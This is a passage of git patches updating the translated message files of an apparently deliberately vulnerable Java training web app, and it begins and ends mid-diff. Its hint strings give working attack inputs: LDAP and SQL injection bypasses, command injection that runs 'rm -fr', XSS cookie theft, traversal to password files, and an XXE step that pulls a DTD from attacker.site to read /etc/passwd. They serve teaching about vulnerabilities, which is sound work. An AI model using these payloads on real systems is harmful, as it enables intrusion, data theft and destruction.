-function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From 46fda642340339e52af28b4d6a0568c9d653e29a Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:42 +0900 Subject: [PATCH 075/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index af3caba..f059658 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance -description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From 452f8c0cdab82699b12afa09fa8fc1cc50adf5f2 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:51:53 +0900 Subject: [PATCH 076/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index f059658..60a7783 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -47,9 +47,9 @@ function.description.path.traversal=There is a path traversal vulnerability in t function.description.redirect.loop=Redirect loop occurs if you click this link. function.description.round.off.error=Round off error can occur. function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.throwable={0} is thrown if you click this link. @@ -167,7 +167,7 @@ label.your.mail=Your Mail Address label.your.name=Your Name msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! msg.authentication.fail=Authentication failed. Please login again. @@ -190,8 +190,8 @@ msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=Please enter your name. -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. -msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=Please enter a positive number. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. @@ -214,7 +214,7 @@ msg.note.clickjacking=This page receives a request that a user does not intend a msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=Password change failed. msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. @@ -262,7 +262,7 @@ msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! From b6210332f7a05a2db436ba772063264433168d09 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:51:55 +0900 Subject: [PATCH 077/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index f059658..60a7783 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -47,9 +47,9 @@ function.description.path.traversal=There is a path traversal vulnerability in t function.description.redirect.loop=Redirect loop occurs if you click this link. function.description.round.off.error=Round off error can occur. function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.throwable={0} is thrown if you click this link. @@ -167,7 +167,7 @@ label.your.mail=Your Mail Address label.your.name=Your Name msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! msg.authentication.fail=Authentication failed. Please login again. @@ -190,8 +190,8 @@ msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=Please enter your name. -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. -msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=Please enter a positive number. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. @@ -214,7 +214,7 @@ msg.note.clickjacking=This page receives a request that a user does not intend a msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=Password change failed. msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. @@ -262,7 +262,7 @@ msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! From 7026749bd7b3c99025a8ad1fa7a39ac98ada68d8 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:51:58 +0900 Subject: [PATCH 078/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index f059658..60a7783 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -47,9 +47,9 @@ function.description.path.traversal=There is a path traversal vulnerability in t function.description.redirect.loop=Redirect loop occurs if you click this link. function.description.round.off.error=Round off error can occur. function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.throwable={0} is thrown if you click this link. @@ -167,7 +167,7 @@ label.your.mail=Your Mail Address label.your.name=Your Name msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! msg.authentication.fail=Authentication failed. Please login again. @@ -190,8 +190,8 @@ msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=Please enter your name. -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. -msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=Please enter a positive number. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. @@ -214,7 +214,7 @@ msg.note.clickjacking=This page receives a request that a user does not intend a msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=Password change failed. msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. @@ -262,7 +262,7 @@ msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! From c4d67c1bb18698a345caf8c950b636c9d18cdc10 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:52:00 +0900 Subject: [PATCH 079/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index f059658..60a7783 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=Access history 